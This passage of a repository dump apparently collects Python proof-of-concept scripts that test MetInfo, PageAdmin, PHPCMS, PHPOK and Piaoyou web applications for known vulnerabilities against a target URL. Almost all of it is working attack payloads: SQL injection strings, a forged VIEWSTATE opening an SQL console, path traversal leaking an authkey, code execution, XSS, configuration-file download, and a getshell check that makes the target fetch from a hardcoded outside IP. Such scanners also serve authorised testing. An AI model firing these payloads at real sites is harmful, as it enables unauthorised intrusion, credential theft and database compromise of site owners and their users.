32 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
33 | if time.time() - start_time >= 6:
34 | cprint("[+]存在metinfo SQL盲注漏洞...(高危)\tpayload: "+vulnurl, "red")
35 | else:
36 | cprint("[-]不存在metinfo_getpassword_sqli漏洞", "white", "on_grey")
37 |
38 | except:
39 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 |
41 | if __name__ == "__main__":
42 | warnings.filterwarnings("ignore")
43 | testVuln = metinfo_getpassword_sqli_BaseVerify(sys.argv[1])
44 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/metinfo/metinfo_login_check_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: metinfo v5.3sql注入漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0100846
6 | author: Lucifer
7 | description: metinfo /admin/login/login_check.php?langset=cn 的langset 参数没有过滤存在sql注入漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class metinfo_login_check_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 |
23 | true_url = self.url + r"/admin/login/login_check.php?langset=cn%27AnD%271%27=%271"
24 | false_url = self.url + r"/admin/login/login_check.php?langset=cn%27AnD%271%27=%272"
25 | try:
26 | req1 = requests.get(true_url, headers=headers, timeout=10, verify=False)
27 | req2 = requests.get(false_url, headers=headers, timeout=10, verify=False)
28 | if r"not have this language" in req2.text and r"not have this language" not in req1.text:
29 | cprint("[+]存在metinfo v5.3 SQL注入漏洞...(高危)\tpayload: "+false_url, "red")
30 | if noexist:
31 | cprint("[-]不存在metinfo_login_check_sqli漏洞", "white", "on_grey")
32 |
33 | except:
34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 |
36 | if __name__ == "__main__":
37 | warnings.filterwarnings("ignore")
38 | testVuln = metinfo_login_check_sqli_BaseVerify(sys.argv[1])
39 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/pageadmin/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/pageadmin/__init__.py
--------------------------------------------------------------------------------
/pocs/pageadmin/pageadmin_forge_viewstate.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-061699
6 | author: Lucifer
7 | description: 利用.NET的bug可以伪造viewstate登录到SQL执行页面,添加任意账户并重置管理员密码。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class pageadmin_forge_viewstate_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if req.status_code == 200 and r"WebForm_DoPostBackWithOptions" in req.text and r"Tb_sql" in req.text:
27 | cprint("[+]存在PageAdmin可“伪造”VIEWSTATE执行任意SQL查询&重置管理员密码漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在pageadmin_forge_viewstate漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = pageadmin_forge_viewstate_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpcms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/phpcms/__init__.py
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_authkey_disclosure.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms authkey泄露
5 | referer: http://wooyun.org/bugs/wooyun-2015-0105242
6 | author: Lucifer
7 | description: PHPCMS authkey 泄露漏洞,可引起SQL注入。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpcms_authkey_disclosure_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\\applist&path=admin"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | m = re.search('(\w{32})',req.text)
28 | if req.status_code == 200 and m:
29 | cprint("[+]存在PHPCMS authkey泄露漏洞...(高危)\tpayload: "+vulnurl+"\tauthkey: "+m.group(1), "red")
30 | else:
31 | cprint("[-]不存在phpcms_authkey_disclosure漏洞", "white", "on_grey")
32 |
33 | except:
34 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
35 |
36 | if __name__ == "__main__":
37 | warnings.filterwarnings("ignore")
38 | testVuln = phpcms_authkey_disclosure_BaseVerify(sys.argv[1])
39 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_digg_add_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms digg_add.php SQL注入
5 | referer: http://www.shangxueba.com/jingyan/2195152.html
6 | author: Lucifer
7 | description: 文件digg_add.php中,参数digg_mod存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_digg_add_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/digg/digg_add.php?id=1&con=2&digg_mod=digg_data%20WHERE%201=2%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(1234),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在PHPCMS digg_add.php SQL注入漏洞...(高危)\t\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在phpcms_digg_add_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = phpcms_digg_add_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
38 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_flash_upload_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 flash_upload.php SQL注入
5 | referer: unknown
6 | author: Lucifer
7 | description: 文件flash_upload.php中,参数modelid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_flash_upload_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/flash_upload.php?modelid=%30%20%61%6E%64%28%73%65%6C%65%63%74%20%31%20%66%72%6F%6D%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%2C%63%6F%6E%63%61%74%28%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%28%73%65%6C%65%63%74%20%63%6F%6E%63%61%74%28%30%78%37%65%2C%6D%64%35%28%33%2E%31%34%31%35%29%2C%30%78%37%65%29%29%29%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%6C%69%6D%69%74%20%30%2C%31%29%2C%66%6C%6F%6F%72%28%72%61%6E%64%28%30%29%2A%32%29%29%78%20%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%74%61%62%6C%65%73%20%67%72%6F%75%70%20%62%79%20%78%29%61%29"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"63e1f04640e83605c1d177544a5a0488" in req.text:
27 | cprint("[+]存在phpcms2008 flash_upload.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在phpcms_flash_upload_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = phpcms_flash_upload_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_product_code_exec.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms2008 product.php 代码执行
5 | referer: http://www.wooyun.org/bugs/WooYun-2011-02984
6 | author: Lucifer
7 | description: 文件product.php中,参数pagesize存在代码注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_product_code_exec_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/yp/product.php?pagesize=${@phpinfo()}"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"Configuration File (php.ini) Path" in req.text:
27 | cprint("[+]存在phpcms2008 product.php 代码执行漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在phpcms_product_code_exec漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = phpcms_product_code_exec_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v961_fileread.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms 9.6.1任意文件读取漏洞
5 | referer: http://bobao.360.cn/learning/detail/3805.html
6 | author: Lucifer
7 | description: phpcms最新版本任意文件读取,漏洞原理见来源页面。
8 | '''
9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpcms_v961_fileread_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "Content-Type":"application/x-www-form-urlencoded",
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | url_preffix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
25 | siteid = ""
26 | att_json = ""
27 | try:
28 | req1 = requests.get(url_preffix, headers=headers, timeout=10, verify=False)
29 | for cookie in req1.cookies:
30 | siteid = cookie.value
31 | payload = "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&filename=test.jpg&src=%26i%3D3%26d%3D1%26t%3D9999999999%26catid%3D1%26ip%3D8.8.8.8%26m%3D3%26modelid%3D3%26s%3Dcaches%2fconfigs%2fsystem.p%26f%3Dh%25253Cp%26xxxx%3D"
32 | vulnurl = self.url + payload
33 | post_data = {
34 | "userid_flash":siteid
35 | }
36 | req2 = requests.post(vulnurl, data=post_data, headers=headers, timeout=10, verify=False)
37 | for cookie in req2.cookies:
38 | att_json = cookie.value
39 | req3 = requests.get(self.url+"/index.php?m=content&c=down&a=init&a_k="+att_json, headers=headers, timeout=10, verify=False)
40 | pattern = '.*?'
41 | link = re.search(pattern, req3.text).group(1)
42 | req4 = requests.get(self.url+"/index.php"+link, headers=headers, verify=False)
43 | if r"可能不存在漏洞", "cyan")
50 |
51 | if __name__ == "__main__":
52 | warnings.filterwarnings("ignore")
53 | testVuln = phpcms_v961_fileread_BaseVerify(sys.argv[1])
54 | testVuln.run()
55 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v96_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9.6.0 SQL注入
5 | referer: https://zhuanlan.zhihu.com/p/26263513
6 | author: Lucifer
7 | description: 过滤函数不严谨造成的过滤绕过。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpcms_v96_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "Content-Type":"application/x-www-form-urlencoded",
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | url_prefix = self.url + "/index.php?m=wap&c=index&a=init&siteid=1"
24 | tmp_cookie = {}
25 | try:
26 | req = requests.get(url_prefix, headers=headers, timeout=10, verify=False)
27 | for cookie in req.cookies:
28 | tmp_cookie = cookie.value
29 | except:
30 | pass
31 | post_data = {
32 | "userid_flash":tmp_cookie
33 | }
34 | url_suffix = self.url + "/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28user%28%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26"
35 | try:
36 | req2 = requests.post(url_suffix, data=post_data, headers=headers, timeout=10, verify=False)
37 | for cookie in req2.cookies:
38 | tmp_cookie = cookie.value
39 | except:
40 | pass
41 |
42 | vulnurl = self.url + "/index.php?m=content&c=down&a_k="+str(tmp_cookie)
43 | try:
44 | req3 = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
45 | if r"XPATH syntax error" in req3.text:
46 | cprint("[+]存在phpcms v9.6.0 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
47 | else:
48 | cprint("[-]不存在phpcms_v96_sqli漏洞", "white", "on_grey")
49 |
50 | except:
51 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
52 |
53 | if __name__ == "__main__":
54 | warnings.filterwarnings("ignore")
55 | testVuln = phpcms_v96_sqli_BaseVerify(sys.argv[1])
56 | testVuln.run()
57 |
--------------------------------------------------------------------------------
/pocs/phpcms/phpcms_v9_flash_xss.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpcms v9 flash xss漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-079938
6 | author: Lucifer
7 | description: 文件player.swf中,存在xss漏洞。
8 | '''
9 | import sys
10 | import urllib.request
11 | import hashlib
12 | import requests
13 | import warnings
14 | from termcolor import cprint
15 |
16 | class phpcms_v9_flash_xss_BaseVerify:
17 | def __init__(self, url):
18 | self.url = url
19 |
20 | def run(self):
21 | headers = {
22 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
23 | }
24 | flash_md5 = "cf00b069e36e756705c49b3a3bf20c40"
25 | payload = "/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//"
26 | vulnurl = self.url + payload
27 | try:
28 | req = urllib.request.urlopen(vulnurl)
29 | data = req.read()
30 | md5_value = hashlib.md5(data).hexdigest()
31 | if md5_value in flash_md5:
32 | cprint("[+]存在phpcms v9 flash xss漏洞...(高危)\tpayload: "+vulnurl, "red")
33 | else:
34 | cprint("[-]不存在phpcms_v9_flash_xss漏洞", "white", "on_grey")
35 |
36 | except:
37 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
38 |
39 | if __name__ == "__main__":
40 | warnings.filterwarnings("ignore")
41 | testVuln = phpcms_v9_flash_xss_BaseVerify(sys.argv[1])
42 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpok/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/phpok/__init__.py
--------------------------------------------------------------------------------
/pocs/phpok/phpok_api_param_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok api.php SQL注入漏洞
5 | referer: http://www.moonsec.com/post-677.html
6 | author: Lucifer
7 | description: api_control文件存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class phpok_api_param_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/api.php?c=api&f=phpok&id=_total¶m[pid]=42¶m[user_id]=0)UnIOn/**/sElEcT/**/mD5(1234)/**/LIMIT/**/1,1%23"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
27 | cprint("[+]存在phpok api.php SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在phpok_api_param_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = phpok_api_param_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/phpok/phpok_remote_image_getshell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok remote_image getshell漏洞
5 | referer: http://0day5.com/archives/1820/
6 | author: Lucifer
7 | description: remote_image_f函数没对远程文件后缀做检查直接保存到本地。
8 | '''
9 | import sys
10 | import time
11 | import hashlib
12 | import datetime
13 | import requests
14 | import warnings
15 | from termcolor import cprint
16 |
17 | class phpok_remote_image_getshell_BaseVerify:
18 | def __init__(self, url):
19 | self.url = url
20 |
21 | def run(self):
22 | headers = {
23 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
24 | }
25 | time_stamp = time.mktime(datetime.datetime.now().timetuple())
26 | m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
27 | md5_str = m.hexdigest()
28 | payload = "/index.php?c=ueditor&f=remote_image&upfile=http://45.76.158.91:6868/" + md5_str
29 | vulnurl = self.url + payload
30 | try:
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | eye_url = "http://45.76.158.91/web.log"
33 | time.sleep(6)
34 | reqr = requests.get(eye_url, headers=headers, timeout=10, verify=False)
35 | if md5_str in reqr.text:
36 | cprint("[+]存在phpok remote_image getshell漏洞...(高危)\tpayload: "+vulnurl, "red")
37 | else:
38 | cprint("[-]不存在phpok_remote_image_getshell漏洞", "white", "on_grey")
39 |
40 | except:
41 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = phpok_remote_image_getshell_BaseVerify(sys.argv[1])
46 | testVuln.run()
47 |
--------------------------------------------------------------------------------
/pocs/phpok/phpok_res_action_control_filedownload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: phpok res_action_control.php 任意文件下载(需要cookies文件)
5 | referer: unknown
6 | author: Lucifer
7 | description: 参数file未经过滤进入到下载方法导致任意文件下载。
8 | '''
9 | import sys
10 | import json
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class phpok_res_action_control_filedownload_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/admin.php?c=res_action&f=download&file=_config/db.ini.php"
24 | vulnurl = self.url + payload
25 | try:
26 | f = open(r'cookies.txt', 'r')
27 | cookies = {}
28 | for line in f.read().split(";"):
29 | name, value = line.strip().split("=",1)
30 | cookies[name]=value
31 | except:
32 | pass
33 | try:
34 | req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10, verify=False)
35 | if r"可能不存在漏洞", "cyan")
42 |
43 | if __name__ == "__main__":
44 | warnings.filterwarnings("ignore")
45 | testVuln = phpok_res_action_control_filedownload_BaseVerify(sys.argv[1])
46 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Binye234/What_Cms_Auto_Poc/56cae28bfecfe3032efe6578c3f571e5de21a3e9/pocs/piaoyou/__init__.py
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_int_order_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统int_order.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0127911
6 | author: Lucifer
7 | description: 文件tickets/int_order.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_int_order_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | payload = "/tickets/int_order.aspx?id=1Or/**/1=CoNvErt(InT,ChAr(66)%2BChAr(66)%2BChAr(66)%2b@@VeRsIoN)--"
23 | vulnurl = self.url + payload
24 | try:
25 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 | if r"BBBMicrosoft" in req.text:
27 | cprint("[+]存在票友票务系统int_order.aspx SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
28 | else:
29 | cprint("[-]不存在piaoyou_int_order_sqli漏洞", "white", "on_grey")
30 |
31 | except:
32 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
33 |
34 | if __name__ == "__main__":
35 | warnings.filterwarnings("ignore")
36 | testVuln = piaoyou_int_order_sqli_BaseVerify(sys.argv[1])
37 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_multi_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_multi_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | urls = ["/ser_Hotel/SearchList.aspx?CityCode=1%27",
23 | "/visa/visa_view.aspx?a=11",
24 | "/travel/Default.aspx?leixing=11",
25 | "/hotel/Default.aspx?s=11",
26 | "/travel/Default.aspx?ecity=%E4%B8%8A%E6%B5%B7&leixing=11",
27 | "/hotel/Default.aspx?s=11"]
28 | try:
29 | noexist = True
30 | for url in urls:
31 | vulnurl = self.url + url + "%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@version)--"
32 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
33 | if r"WtFaBcMic" in req.text:
34 | cprint("[+]存在票友机票预订系统SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
35 | noexist = False
36 | if noexist:
37 | cprint("[-]不存在piaoyou_multi_sqli漏洞", "white", "on_grey")
38 |
39 | except:
40 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
41 |
42 | if __name__ == "__main__":
43 | warnings.filterwarnings("ignore")
44 | testVuln = piaoyou_multi_sqli_BaseVerify(sys.argv[1])
45 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_newsview_list.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友票务系统通用sql注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0128207
6 | author: Lucifer
7 | description: 文件/newslist.aspx中,参数newsid存在SQL注入。
8 | 文件/news_view.aspx中,参数id存在SQL注入。
9 | '''
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 |
15 | class piaoyou_newsview_list_BaseVerify:
16 | def __init__(self, url):
17 | self.url = url
18 |
19 | def run(self):
20 | headers = {
21 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 | }
23 | payload = "/newslist.aspx?newsid=1Or/**/1=CoNvErT(InT,(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN))--"
24 | vulnurl = self.url + payload
25 | try:
26 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
27 | if r"BBBMicrosoft" in req.text:
28 | cprint("[+]存在票友票务系统通用sql注入漏洞...(高危)\tpayload: "+vulnurl, "red")
29 |
30 | vulnurl = self.url + "/news_view.aspx?id=1Or/**/1=CoNvErT(InT,(ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN))--"
31 | req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
32 | if r"BBBMicrosoft" in req.text:
33 | cprint("[+]存在票友票务系统通用sql注入漏洞...(高危)\tpayload: "+vulnurl, "red")
34 | else:
35 | cprint("[-]不存在piaoyou_newsview_list漏洞", "white", "on_grey")
36 |
37 | except:
38 | cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
39 |
40 | if __name__ == "__main__":
41 | warnings.filterwarnings("ignore")
42 | testVuln = piaoyou_newsview_list_BaseVerify(sys.argv[1])
43 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/piaoyou/piaoyou_six2_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 票友机票预订系统6处SQL注入2(绕过)
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0116851
6 | author: Lucifer
7 | description: multi sqli。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class piaoyou_six2_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | headers = {
20 | "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 | }
22 | urls = ["/Parmset/sms_mb_edit.aspx?id=1",
23 | "/Sales/meb_edit.aspx?id=1",
24 | "/Sales/meb_his.aspx?id=1",
25 | "/Other/hotel_edit.aspx?id=1",
26 | "/Visa/visa_edit.aspx?id=1",
